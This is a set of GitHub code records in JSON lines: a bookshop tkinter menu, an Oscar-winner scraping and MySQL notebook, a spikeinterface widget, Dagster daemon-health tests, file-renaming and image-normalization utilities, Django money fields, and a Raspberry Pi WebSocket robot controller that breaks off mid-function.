{"seq_id":"12422908212","text":"import tkinter as tk\nfrom tkinter import ttk\nimport sqlite3\nimport os\n\nimport supplier_db\nfrom text_processor import TextProcessor\nfrom school_order_organizer import SchoolOrderGUI\nfrom replenishment_optimizer_V3 import ReplenishmentOptimizer\nfrom sales_op_v2_bs import SalesReportOptimizer\nimport test_keep_v0\nimport buy_cal\n\nclass FlowOfBooks(tk.Tk):\n    def __init__(self):\n        super().__init__()\n        # Create connection to the database\n        db_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"orders.db\")\n        self.conn = sqlite3.connect(db_path)\n        self.orders_conn = sqlite3.connect('orders.db')\n\n        print(f\"FlowOfBooks orders_db connection: {self.orders_conn}\")\n\n        # Window settings\n        self.title(\"Flow of Books\")\n        self.geometry(\"400x400\")\n\n        # Create main frame\n        main_frame = tk.Frame(self, width=560, height=420)\n        main_frame.place(relx=0.5, rely=0.5, anchor=\"center\")\n\n        # Create buttons for parent directories\n        btn_style = ttk.Style()\n        btn_style.configure('big.TButton', font=('Arial', 20))\n\n        upstream_btn = ttk.Button(main_frame, text=\"Upstream\", style='big.TButton', command=self.show_upstream_menu)\n        upstream_btn.pack(fill=\"both\", expand=True)\n        midstream_btn = ttk.Button(main_frame, text=\"Mid-Stream\", style='big.TButton', 
command=self.show_midstream_menu)\n midstream_btn.pack(fill=\"both\", expand=True)\n downstream_btn = ttk.Button(main_frame, text=\"Downstream\", style='big.TButton', command=self.show_downstream_menu)\n downstream_btn.pack(fill=\"both\", expand=True)\n\n def show_upstream_menu(self):\n # Create Upstream menu\n upstream_menu = tk.Menu(self, tearoff=0)\n\n # Add Supplier submenu\n supplier_submenu = tk.Menu(upstream_menu, tearoff=0)\n supplier_submenu.add_command(label=\"Missing Shipment Tracker\")\n supplier_submenu.add_command(label=\"Supplier Contact DB\", command=supplier_db.main)\n upstream_menu.add_cascade(label=\"Supplier\", menu=supplier_submenu)\n\n # Add Product submenu\n product_submenu = tk.Menu(upstream_menu, tearoff=0)\n product_submenu.add_command(label=\"Text Processor\", command=self.open_text_processor)\n product_submenu.add_command(label=\"Buying Calculator\", command=buy_cal.main)\n upstream_menu.add_cascade(label=\"Product\", menu=product_submenu)\n\n # Show menu\n self.show_menu(upstream_menu)\n\n def show_midstream_menu(self):\n # Create Mid-Stream menu\n midstream_menu = tk.Menu(self, tearoff=0)\n midstream_menu.add_command(label=\"Project Manager\", command=test_keep_v0.main)\n midstream_menu.add_command(label=\"Book Catalog\")\n\n # Show menu\n self.show_menu(midstream_menu)\n\n def show_downstream_menu(self):\n # Create Downstream menu\n downstream_menu = tk.Menu(self, tearoff=0)\n\n # Add Customer submenu\n customer_submenu = tk.Menu(downstream_menu, tearoff=0)\n customer_submenu.add_command(label=\"Customer Order Organizer\", command=self.open_customer_order_app)\n downstream_menu.add_cascade(label=\"Customer\", menu=customer_submenu)\n\n # Add Shops submenu\n shop_submenu = tk.Menu(downstream_menu, tearoff=0)\n shop_submenu.add_command(label=\"Replenishment Optimizer\", command=self.open_replenishment_optimizer)\n shop_submenu.add_command(label=\"Sales Report Optimizer\",\n command=self.open_sales_report_optimizer) # Add this line\n downstream_menu.add_cascade(label=\"Shops\", menu=shop_submenu)\n\n # Add School Order Organizer\n downstream_menu.add_command(label=\"School Order Organizer\", command=self.open_school_order_organizer)\n\n # Show menu\n self.show_menu(downstream_menu)\n\n def show_menu(self, menu):\n x, y = self.winfo_pointerxy()\n menu.post(x, y)\n\n def open_text_processor(self):\n TextProcessor()\n\n def open_school_order_organizer(self):\n SchoolOrderGUI(tk.Toplevel())\n\n def open_replenishment_optimizer(self):\n ReplenishmentOptimizer()\n\n def open_sales_report_optimizer(self):\n SalesReportOptimizer()\n\n def open_customer_order_app(self):\n customer_order_window = tk.Toplevel(self)\n customer_order_app = CustomerOrderApp(customer_order_window, self.orders_conn)\n\n\n\nif __name__ == \"__main__\":\n app = FlowOfBooks()\n app.mainloop()\n\n\n","repo_name":"robinpchan/FlowofBooks","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27604410056","text":"\n# coding: utf-8\n\n# In[1]:\n\n# This project involves using Beautiful Soup to extract information relating to Oscar winners from Wikipedia pages. In total \n# six different pages will be accessed in order to obtain the following:\n# 1. Best Picture \n# 2. Best Director\n# 3. Best Actor\n# 4. Best Actress\n# 5. Best Supporting Actor\n# 6. Best Supporting Actress\n# Once the data has been retrieved from each page, it will be stored in dataframes. 
I will then connect to MySQL, create tables\n# and insert the data there. Finally I will run queries on the database to provide useful insight.\n\n\n# In[2]:\n\nimport pandas as pd # For creating dataframes\n\n\n# In[3]:\n\n# Import functions from file\nfrom functions import loadPage, extractYears, extractFilmData\n\n\n# In[4]:\n\n# Page 1- Best Picture\n# Call function to read in URL and retrieve data from the page\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Picture\")\n# From the data get all the tables that have the following class\ntables = data.findAll(\"table\", class_= \"wikitable\")\n\n\n# In[5]:\n\n# Call function to get the film data from tables\ndata = extractFilmData(\"picture\", tables)\n# Create lists from the dictionary columns\nfilms = data[\"films\"]\nproducer = data[\"names\"]\n# Call function to get a list of years from tables\nyears = extractYears(\"picture\", tables)\n\n\n# In[6]:\n\n# Check the length of each list. They are all the same length.\nprint(len(films))\nprint(len(producer))\nprint(len(years))\n\n\n# In[7]:\n\n# Create a data frame for storing each Best Picture Winner\ndf_picture = pd.DataFrame()\ndf_picture[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_picture[\"Film\"] = films\ndf_picture[\"Producers\"] = producer\n# Show the dataframe\ndf_picture\n\n\n# In[8]:\n\n# Page2 - Best Director\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Director\")\ntables = data.findAll(\"table\", class_= \"wikitable sortable\")\n\n\n# In[9]:\n\ndata = extractFilmData(\"director\", tables)\nfilms = data[\"films\"]\ndirectors = data[\"names\"]\nyears = extractYears(\"director\", tables)\n\n\n# In[10]:\n\n# Check the length of each list. Due to the 1st Oscars having multiple awards they are not the same length\nprint(len(films))\nprint(len(directors))\nprint(len(years))\n\n\n# In[11]:\n\n# To amend this lets insert a year at the position 1 with the same value as the year at position 0\nyears.insert(1, years[0])\n\n\n# In[12]:\n\n# Now they are all the same length\nprint(len(films))\nprint(len(directors))\nprint(len(years))\n\n\n# In[13]:\n\ndf_directors = pd.DataFrame()\ndf_directors[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_directors[\"Director\"] = directors\ndf_directors[\"Film\"] = films\n# Look at the data frame and see the first two indexes have the same year.\ndf_directors\n\n\n# In[14]:\n\n# Page 3- Best Actor\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Actor\")\ntables = data.findAll(\"table\", class_= \"wikitable sortable\")\n\n\n# In[15]:\n\ndata = extractFilmData(\"actor\", tables)\nfilms = data[\"films\"]\nactors = data[\"names\"]\nyears = extractYears(\"actor\", tables)\n\n\n# In[16]:\n\n# Check the length of each list. They are not the same length. There are two reasons for this.\n# 1. In the 1st Oscars ceremony, the actor won awards for two films\n# 2. 
In 1932 there was a tie for 1st place\nprint(len(films))\nprint(len(actors))\nprint(len(years))\n\n\n# In[17]:\n\n# To amend this lets insert the actor at position 0 into position 1 and insert the appropriate years at position 1 and 6 of years\nactors.insert(1, actors[0])\nyears.insert(1, years[0])\nyears.insert(6, years[5])\n\n\n# In[18]:\n\n# Now they are all the same length\nprint(len(films))\nprint(len(actors))\nprint(len(years))\n\n\n# In[19]:\n\ndf_actors = pd.DataFrame()\ndf_actors[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_actors[\"Actor\"] = actors\ndf_actors[\"Film\"] = films\n# Show the dataframe and look at years 1928 and 1932\ndf_actors\n\n\n# In[20]:\n\n# Page 4- Best Actress\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Actress\")\ntables = data.findAll(\"table\", class_= \"wikitable sortable\")\n\n\n# In[21]:\n\ndata = extractFilmData(\"actress\", tables)\nfilms = data[\"films\"]\nactresses = data[\"names\"]\nyears = extractYears(\"actress\", tables)\n\n\n# In[22]:\n\n# Check the length of each list. They are not the same. There are two reasons for this.\n# 1. In the 1st Oscars the actress won awards for three films\n# 2. In 1968 there was a tie for 1st place\nprint(len(actresses))\nprint(len(films))\nprint(len(years))\n\n\n# In[23]:\n\n# Lets amend this by inserting the actress at the position 0 to positions 1 and 2. Do the same for the years\n# Also insert the year at position 40 into position 41\nactresses.insert(1, actresses[0])\nactresses.insert(2, actresses[1])\nyears.insert(41, years[40])\nyears.insert(1, years[0])\nyears.insert(2, years[1])\n\n\n# In[24]:\n\n# Now they are all the same length\nprint(len(actresses))\nprint(len(films))\nprint(len(years))\n\n\n# In[25]:\n\ndf_actresses = pd.DataFrame()\ndf_actresses[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_actresses[\"Actress\"] = actresses\ndf_actresses[\"Film\"] = films\n# Show the dataframe and look at the first three rows which have the same year and actress but different films\ndf_actresses\n\n\n# In[26]:\n\n# Now check the year 1968 and see two actresses and two films\ndf_actresses.loc[df_actresses['Year'] == 1968]\n\n\n# In[27]:\n\n# Page 5 - Best Supporting Actor\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Supporting_Actor\")\ntables = data.findAll(\"table\", class_= \"wikitable sortable\")\n\n\n# In[28]:\n\ndata = extractFilmData(\"supporting actor\", tables)\nfilms = data[\"films\"]\nactors = data[\"names\"]\nyears = extractYears(\"supporting actor\", tables)\n\n\n# In[29]:\n\n# Check all lists are the same length, they are\nprint(len(actors))\nprint(len(films))\nprint(len(years))\n\n\n# In[30]:\n\ndf_supActors = pd.DataFrame()\ndf_supActors[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_supActors[\"Actor\"] = actors\ndf_supActors[\"Film\"] = films\ndf_supActors\n\n\n# In[31]:\n\n# Page 6 - Best Supporting Actress\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Supporting_Actress\")\ntables = data.findAll(\"table\", class_= \"wikitable sortable\")\n\n\n# In[32]:\n\ndata = extractFilmData(\"supporting actress\", tables)\nfilms = data[\"films\"]\nactresses = data[\"names\"]\nyears = extractYears(\"supporting actress\", tables)\n\n\n# In[33]:\n\n# Check all the lists are the same length, they are\nprint(len(actresses))\nprint(len(films))\nprint(len(years))\n\n\n# In[34]:\n\ndf_supActresses = pd.DataFrame()\ndf_supActresses[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_supActresses[\"Actress\"] = 
actresses\ndf_supActresses[\"Film\"] = films\ndf_supActresses\n\n\n# In[35]:\n\n# Print the number of rows in each data frame\nprint(\"total best picture winners \" '{0}'.format(df_picture.shape[0]))\nprint(\"total best director winners \" '{0}'.format(df_directors.shape[0]))\nprint(\"total best actor winners \" '{0}'.format(df_actors.shape[0]))\nprint(\"total best actress winners \" '{0}'.format(df_actresses.shape[0]))\nprint(\"total best supp. actor winners \" '{0}'.format(df_supActors.shape[0]))\nprint(\"total best supp. actress winners \" '{0}'.format(df_supActresses.shape[0]))\n\n\n# In[36]:\n\n# Now all the data has been read into data frames, the next step is to connect to MySQL and store it in the database\nfrom sqlalchemy import create_engine # For connecting to MySQL\nfrom MySQL_connect import config # Import connection parameters from file\n\n# Use the parameters to create connection variables\nuser = config['user']\npassword = config['password']\nhost = config['host']\ndb = config['db']\n\n# Connection object for MySQL\nengine = create_engine(\"mysql+mysqldb://\"+user+\":\"+password+\"@\"+host+\"/\"+db+\"?charset=utf8\")\n\n\n# In[37]:\n\n# Insert the data from each data frame into tables. If the table already exists, overwrite it\ndf_picture.to_sql('winner_best_picture', con=engine, if_exists='replace', index_label='id')\ndf_directors.to_sql('winner_best_director', con=engine, if_exists='replace', index_label='id')\ndf_actors.to_sql('winner_best_actor', con=engine, if_exists='replace', index_label='id')\ndf_actresses.to_sql('winner_best_actress', con=engine, if_exists='replace', index_label='id')\ndf_supActors.to_sql('winner_best_supporting_actor', con=engine, if_exists='replace', index_label='id')\ndf_supActresses.to_sql('winner_best_supporting_actress', con=engine, if_exists='replace', index_label='id')\n\n\n# In[38]:\n\n# Show that the tables have been created\nres = engine.execute(\"SHOW TABLES\")\nfor x in res:\n    print(x)\n\n\n# In[39]:\n\n# Now let's run some queries on the tables\n# First return the number of rows in each table\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_picture\")\nprint(\"Best Picture number of rows\")\nfor x in num_res:\n    print(x)\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_director\")\nprint(\"Best Director number of rows\")\nfor x in num_res:\n    print(x)\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_actor\")\nprint(\"Best Actor number of rows\")\nfor x in num_res:\n    print(x)\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_actress\")\nprint(\"Best Actress number of rows\")\nfor x in num_res:\n    print(x)\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_supporting_actor\")\nprint(\"Best Supporting Actor number of rows\")\nfor x in num_res:\n    print(x)\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_supporting_actress\")\nprint(\"Best Supporting Actress number of rows\")\nfor x in num_res:\n    print(x)\n\n\n# In[40]:\n\n# For displaying results in a table format\nfrom prettytable import PrettyTable \n\n\n# In[41]:\n\n# Query: Return a list of actors who have won an Oscar. In descending order of wins\n# Explained: We are using two tables - best_actor and best_supporting_actor. Therefore we use UNION inside a subquery to \n# combine the results of two queries into one set. 
Each query counts the total for each actor so we sum both totals to get \n# the total number of wins for each actor.\nactor_mostWins = engine.execute(\"SELECT actor, SUM(total_wins) AS total_wins FROM (SELECT actor, COUNT(actor) AS total_wins FROM winner_best_actor GROUP BY actor UNION SELECT actor, COUNT(actor) AS total_wins FROM winner_best_supporting_actor GROUP BY actor) AS res GROUP BY actor ORDER BY total_wins DESC, actor ASC\")\n\ntable = PrettyTable(['Actor', 'Wins'])\nfor x in actor_mostWins:\n table.add_row([x['actor'], x['total_wins']])\nprint(table)\n\n\n# In[42]:\n\n# Query: Return a list of actresses who have won an Oscar. In descending order of wins\n# Explained: We are using two tables - best_actress and best_supporting_actress. Therefore we use UNION inside a subquery to \n# combine the results of two queries into one set. Each query counts the total for each actress so we sum both totals to get \n# the total number of wins for each actress.\nactress_mostWins = engine.execute(\"SELECT actress, SUM(total_wins) AS total_wins FROM ( SELECT actress, COUNT(actress) AS total_wins FROM winner_best_actress GROUP BY actress UNION SELECT actress, COUNT(actress) AS total_wins FROM winner_best_supporting_actress GROUP BY actress) AS res GROUP BY actress ORDER BY total_wins DESC, actress ASC\")\n\ntable = PrettyTable(['Actress', 'Wins'])\nfor x in actress_mostWins:\n table.add_row([x['actress'], x['total_wins']])\nprint(table)\n\n\n# In[43]:\n\n# Query: Return a list of directors who have won an Oscar. In descending order of wins\n# Explained: Because the 1st Osars had winners in different categories we have to use substring to get rid of any brackets at\n# the end of any names. With the names correct we can now get the total for each director\ndirector_mostWins = engine.execute(\"SELECT director, SUM(num_wins) AS total_wins FROM (SELECT IF(SUBSTRING(director, LENGTH(director)) = ')', SUBSTRING(director, 1, POSITION('(' IN director) -1), director) AS director, COUNT( IF(SUBSTRING(director, LENGTH(director)) = ')', SUBSTRING(director, 1, POSITION('(' IN Director) -1), Director)) AS num_wins FROM winner_best_director GROUP BY Director ) AS res GROUP BY Director ORDER BY total_wins DESC, director ASC\");\n\ntable = PrettyTable(['Director', 'Wins'])\nfor x in director_mostWins:\n table.add_row([x['director'], x['total_wins']])\nprint(table)\n\n\n# In[44]:\n\n# Query: Return a list of best picture winning producers in descending order of total wins\n# Explained: This query is difficult because the producers column can have multiple names in it. We are interested in the first\n# name as that is usually the director. The names can be seperated by either commas or 'and' so we use search for the position \n# of the first comma. If a comma is found then use that as the maximum index for the substring. If not then search for the \n# position of ' and ' and use that as the maximum index. 
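(For example, a hypothetical producers value like \"Saul Zaentz, Michael Douglas\" would reduce to \"Saul Zaentz\".) 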
Finally return the substring and use it for the count.\npicture_mostWins = engine.execute(\"SELECT IF (POSITION(',' IN producers) > 0, SUBSTRING(producers, 1, POSITION(',' IN producers) -1) , IF(POSITION(' and ' IN producers) > 0, SUBSTRING(producers, 1, POSITION(' and ' IN producers)), producers) ) AS name, COUNT(producers) AS total_wins FROM winner_best_picture GROUP BY name ORDER BY total_wins DESC, name ASC\")\n\ntable = PrettyTable(['Producer', 'Wins'])\nfor x in picture_mostWins:\n table.add_row([x['name'], x['total_wins']])\nprint(table)\n\n","repo_name":"emmet-gingles/Jupyter-OscarWinners","sub_path":"Oscar_Winners.py","file_name":"Oscar_Winners.py","file_ext":"py","file_size_in_byte":13253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17889165817","text":"from .unit_waveforms import UnitWaveformsWidget\nfrom .base import to_attr\n\n\nclass UnitTemplatesWidget(UnitWaveformsWidget):\n # doc is copied from UnitWaveformsWidget\n\n def __init__(self, *args, **kargs):\n kargs[\"plot_waveforms\"] = False\n UnitWaveformsWidget.__init__(self, *args, **kargs)\n\n def plot_sortingview(self, data_plot, **backend_kwargs):\n import sortingview.views as vv\n from .utils_sortingview import generate_unit_table_view, make_serializable, handle_display_and_url\n\n dp = to_attr(data_plot)\n\n # ensure serializable for sortingview\n unit_id_to_channel_ids = dp.sparsity.unit_id_to_channel_ids\n unit_id_to_channel_indices = dp.sparsity.unit_id_to_channel_indices\n\n unit_ids, channel_ids = make_serializable(dp.unit_ids, dp.channel_ids)\n\n templates_dict = {}\n for u_i, unit in enumerate(unit_ids):\n templates_dict[unit] = {}\n templates_dict[unit][\"mean\"] = dp.templates[u_i].T.astype(\"float32\")[unit_id_to_channel_indices[unit]]\n templates_dict[unit][\"std\"] = dp.template_stds[u_i].T.astype(\"float32\")[unit_id_to_channel_indices[unit]]\n\n aw_items = [\n vv.AverageWaveformItem(\n unit_id=u,\n channel_ids=list(unit_id_to_channel_ids[u]),\n waveform=t[\"mean\"].astype(\"float32\"),\n waveform_std_dev=t[\"std\"].astype(\"float32\"),\n )\n for u, t in templates_dict.items()\n ]\n\n locations = {str(ch): dp.channel_locations[i_ch].astype(\"float32\") for i_ch, ch in enumerate(channel_ids)}\n v_average_waveforms = vv.AverageWaveforms(average_waveforms=aw_items, channel_locations=locations)\n\n if not dp.hide_unit_selector:\n v_units_table = generate_unit_table_view(dp.waveform_extractor.sorting)\n\n self.view = vv.Box(\n direction=\"horizontal\",\n items=[vv.LayoutItem(v_units_table, max_size=150), vv.LayoutItem(v_average_waveforms)],\n )\n else:\n self.view = v_average_waveforms\n\n self.url = handle_display_and_url(self, self.view, **backend_kwargs)\n\n\nUnitTemplatesWidget.__doc__ = UnitWaveformsWidget.__doc__\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/widgets/unit_templates.py","file_name":"unit_templates.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"9886760027","text":"import time\n\nimport pytest\nfrom dagster._core.scheduler import DagsterDaemonScheduler\nfrom dagster._daemon.daemon import SensorDaemon\nfrom dagster._daemon.types import DaemonHeartbeat\nfrom dagster._utils.error import SerializableErrorInfo\nfrom dagster_graphql.test.utils import execute_dagster_graphql\n\nfrom dagster_graphql_tests.graphql.graphql_context_test_suite import (\n 
ExecutingGraphQLContextTestMatrix,\n)\n\nINDIVIDUAL_DAEMON_QUERY = \"\"\"\nquery InstanceDetailSummaryQuery {\n instance {\n daemonHealth {\n id\n sensor: daemonStatus(daemonType: \"SENSOR\") {\n daemonType\n required\n healthy\n lastHeartbeatTime\n }\n run_coordinator: daemonStatus(daemonType: \"QUEUED_RUN_COORDINATOR\") {\n daemonType\n required\n healthy\n lastHeartbeatTime\n }\n scheduler: daemonStatus(daemonType: \"SCHEDULER\") {\n daemonType\n required\n healthy\n lastHeartbeatTime\n }\n }\n }\n}\n\"\"\"\n\nALL_DAEMON_QUERY = \"\"\"\nquery InstanceDetailSummaryQuery {\n instance {\n daemonHealth {\n id\n allDaemonStatuses {\n daemonType\n required\n healthy\n lastHeartbeatTime\n }\n }\n }\n}\n\"\"\"\n\nDAEMON_HEALTH_QUERY = \"\"\"\nquery InstanceDetailSummaryQuery {\n instance {\n daemonHealth {\n id\n sensor: daemonStatus(daemonType: \"SENSOR\"){\n lastHeartbeatErrors {\n message\n }\n healthy\n }\n }\n }\n}\n\"\"\"\n\n\nclass TestDaemonHealth(ExecutingGraphQLContextTestMatrix):\n def test_get_individual_daemons(self, graphql_context):\n if graphql_context.instance.is_ephemeral:\n pytest.skip(\"The daemon isn't compatible with an in-memory instance\")\n graphql_context.instance.add_daemon_heartbeat(\n DaemonHeartbeat(\n timestamp=100.0, daemon_type=SensorDaemon.daemon_type(), daemon_id=None, errors=None\n )\n )\n results = execute_dagster_graphql(graphql_context, INDIVIDUAL_DAEMON_QUERY)\n\n scheduler_required = isinstance(graphql_context.instance.scheduler, DagsterDaemonScheduler)\n assert results.data == {\n \"instance\": {\n \"daemonHealth\": {\n \"id\": \"daemonHealth\",\n \"sensor\": {\n \"daemonType\": \"SENSOR\",\n \"required\": True,\n \"healthy\": False,\n \"lastHeartbeatTime\": 100.0,\n },\n \"run_coordinator\": {\n \"daemonType\": \"QUEUED_RUN_COORDINATOR\",\n \"required\": False,\n \"healthy\": None,\n \"lastHeartbeatTime\": None,\n },\n \"scheduler\": {\n \"daemonType\": \"SCHEDULER\",\n \"required\": scheduler_required,\n \"healthy\": False if scheduler_required else None,\n \"lastHeartbeatTime\": None,\n },\n }\n }\n }\n\n def test_get_all_daemons(self, graphql_context):\n if graphql_context.instance.is_ephemeral:\n pytest.skip(\"The daemon isn't compatible with an in-memory instance\")\n results = execute_dagster_graphql(graphql_context, ALL_DAEMON_QUERY)\n scheduler_required = isinstance(graphql_context.instance.scheduler, DagsterDaemonScheduler)\n\n assert results.data == {\n \"instance\": {\n \"daemonHealth\": {\n \"id\": \"daemonHealth\",\n \"allDaemonStatuses\": [\n {\n \"daemonType\": \"SENSOR\",\n \"required\": True,\n \"healthy\": False,\n \"lastHeartbeatTime\": None,\n },\n {\n \"daemonType\": \"BACKFILL\",\n \"required\": True,\n \"healthy\": False,\n \"lastHeartbeatTime\": None,\n },\n {\n \"daemonType\": \"ASSET\",\n \"required\": True,\n \"healthy\": False,\n \"lastHeartbeatTime\": None,\n },\n ]\n + (\n [\n {\n \"daemonType\": \"SCHEDULER\",\n \"required\": True,\n \"healthy\": False if scheduler_required else None,\n \"lastHeartbeatTime\": None,\n }\n ]\n if scheduler_required\n else []\n ),\n }\n }\n }\n\n def test_get_daemon_error(self, graphql_context):\n if graphql_context.instance.is_ephemeral:\n pytest.skip(\"The daemon isn't compatible with an in-memory instance\")\n graphql_context.instance.add_daemon_heartbeat(\n DaemonHeartbeat(\n timestamp=time.time(),\n daemon_type=SensorDaemon.daemon_type(),\n daemon_id=None,\n errors=[\n SerializableErrorInfo(message=\"foobar\", stack=[], cls_name=None, cause=None)\n ],\n )\n )\n results = 
execute_dagster_graphql(graphql_context, DAEMON_HEALTH_QUERY)\n assert results.data[\"instance\"][\"daemonHealth\"][\"sensor\"] == {\n \"lastHeartbeatErrors\": [{\"message\": \"foobar\"}],\n \"healthy\": True,\n }\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster-graphql/dagster_graphql_tests/graphql/test_daemon_health.py","file_name":"test_daemon_health.py","file_ext":"py","file_size_in_byte":6014,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"27346756587","text":"import os\nimport shutil\n\n\nx=input('number: ')\npath='C:\\\\Users\\\\Drastis\\\\Desktop\\\\Bleach 1-686(Complete)\\\\Bleach v'+x\nnewpath='C:\\\\Users\\\\Drastis\\\\Desktop\\\\Bleach 1-686(Complete)\\\\v'+x\n\n\narr = os.listdir(path)\n\n\n# print(arr)\ncnt=0\ncnt2=1\nfor j,i in enumerate(arr):\n link = path+\"\\\\\"+i\n arr2 = os.listdir(link)\n if len(arr2)==1:\n link = path+\"\\\\\"+i+'\\\\'+arr2[0]\n arr3 = os.listdir(link)\n arr2 = arr3\n print(i)\n print(arr2)\n # input('')\n for numberer,img in enumerate(arr2):\n if img[-4:] != '.png' and img[-4:] != '.jpg':\n print(img)\n input('@@')\n continue\n cnt2+=2\n old_name=link+'\\\\'+img\n new_name=newpath+'\\\\'+str(cnt2)+'.png'\n shutil.move(old_name, new_name)\n print(new_name)\n\n print(cnt)\n cnt+=1\n\n# os.rename(r'file path\\OLD file name.file type',r'file path\\NEW file name.file type')\n\n\n#v66\n#v70,1,2,47","repo_name":"gianandr4/MANGA_DOWNLOADER","sub_path":"venv/renamer.py","file_name":"renamer.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30557763793","text":"import numpy as np\n\ndef image_histogram_equalization(image, number_bins=500):\n # from http://www.janeriksolem.net/2009/06/histogram-equalization-with-python-and.html\n # get image histogram\n image_histogram, bins = np.histogram(image.flatten(), number_bins, density=True)\n cdf = image_histogram.cumsum() # cumulative distribution function\n cdf = cdf / cdf[-1] # normalize\n\n # use linear interpolation of cdf to find new pixel values\n image_equalized = np.interp(image.flatten(), bins[:-1], cdf)\n\n image_equalized[~np.isfinite(image_equalized)] = 0. 
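 # zero out any non-finite pixels before reshaping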
\n    \n    return image_equalized.reshape(image.shape)#, cdf\n\ndef normalize_qv(qv):\n    qv_log = np.log(qv * 1e4 + 0.001)\n    qv_log_norm = (qv_log - 1.06) / 2.15\n    return qv_log_norm","repo_name":"tjvandal/windflow-light","sub_path":"windflow/datasets/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
{"seq_id":"18229439993","text":"from django.db.models import CharField, DecimalField\nfrom django.utils.translation import gettext_lazy as _\n\nCHOICES = [\n    ('CZK', 'CZK'),\n    ('EUR', 'EUR'),\n    ('USD', 'USD'),\n]\n\n\nclass AmountField(DecimalField):\n\n    def __init__(self, *args, **kwargs):\n        kwargs['decimal_places'] = kwargs.get('decimal_places', 2)\n        kwargs['default'] = kwargs.get('default', 0)\n        kwargs['max_digits'] = kwargs.get('max_digits', 19)\n        kwargs['verbose_name'] = kwargs.get('verbose_name', _('Amount'))\n        super().__init__(*args, **kwargs)\n\n\nclass CurrencyField(CharField):\n\n    def __init__(self, *args, **kwargs):\n        kwargs['max_length'] = kwargs.get('max_length', 3)\n        kwargs['blank'] = kwargs.get('blank', False)\n        kwargs['null'] = kwargs.get('null', False)\n        kwargs['choices'] = kwargs.get('choices', CHOICES)\n        kwargs['default'] = kwargs.get('default', 'CZK')\n        kwargs['verbose_name'] = kwargs.get('verbose_name', _('Currency'))\n        kwargs['help_text'] = kwargs.get(\n            'help_text',\n            _('ISO 4217 defined three letter currency abbreviation')\n        )\n        super().__init__(*args, **kwargs)\n","repo_name":"just-paja/polocas-napadu-api","sub_path":"accounting/models/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"13385314847","text":"#!/home/pi/server\n# coding=utf-8\nimport websocket\nimport lib.basicMovement as move\nimport lib.pictureGet as photo\nimport lib.gpsGet as gps\n\n# Initial parameters\nspeed = 50\nmoveTime = 2\n\n\n# WebSocket message handler\ndef on_message(self, message):\n    global speed\n    global moveTime\n    default = True\n    # Simple re-authentication\n    if \"success\" in message:\n        ws.send('get')\n        default = False\n        return\n\n    if \"fail\" in message:\n        ws.send('admin')\n        default = False\n        return\n\n    if \"up\" in message:\n        m = message.split(\" \")\n        if len(m) <= 1:\n            move.t_up(speed,moveTime)\n        else:\n            move.t_up(speed,int(m[1]))\n        ws.send('ok')\n        default = False\n        return\n\n    if \"down\" in message:\n        m = message.split(\" \")\n        if len(m) <= 1:\n            move.t_down(speed, moveTime)\n        else:\n            move.t_down(speed, int(m[1]))\n        ws.send('ok')\n        default = False\n        return\n\n    if \"left\" in message:\n        m = message.split(\" \")\n        if len(m) <= 1:\n            move.t_left(speed, moveTime)\n        else:\n            move.t_left(speed, int(m[1]))\n        ws.send('ok')\n        default = False\n        return\n\n    if \"right\" in message:\n        m = message.split(\" \")\n        if len(m) <= 1:\n            move.t_right(speed, moveTime)\n        else:\n            move.t_right(speed, int(m[1]))\n        ws.send('ok')\n        default = False\n        return\n\n    if \"stop\" in message:\n        m = message.split(\" \")\n        if len(m) <= 1:\n            move.t_stop(2)\n        else:\n            move.t_stop(int(m[1]))\n        ws.send('ok')\n        default = False\n        return\n\n    if \"changeSpeed\" in message:\n        m = message.split(\" \")\n        if len(m) <= 1:\n            speed = 50\n        else:\n            speed = int(m[1])\n        ws.send('ok')\n        default = False\n        return\n\n    if \"photo\" in message:\n        photo.photo()\n        ws.send('ok')\n        default = False\n        return\n\n    if \"getGps\" in message:\n        GPSInfo = gps.gps_inof()\n        ws.send(str(GPSInfo))\n        default = False\n        return\n\n    if default:\n        
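# Unknown command: log it and tell the client it was not recognized.\n        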
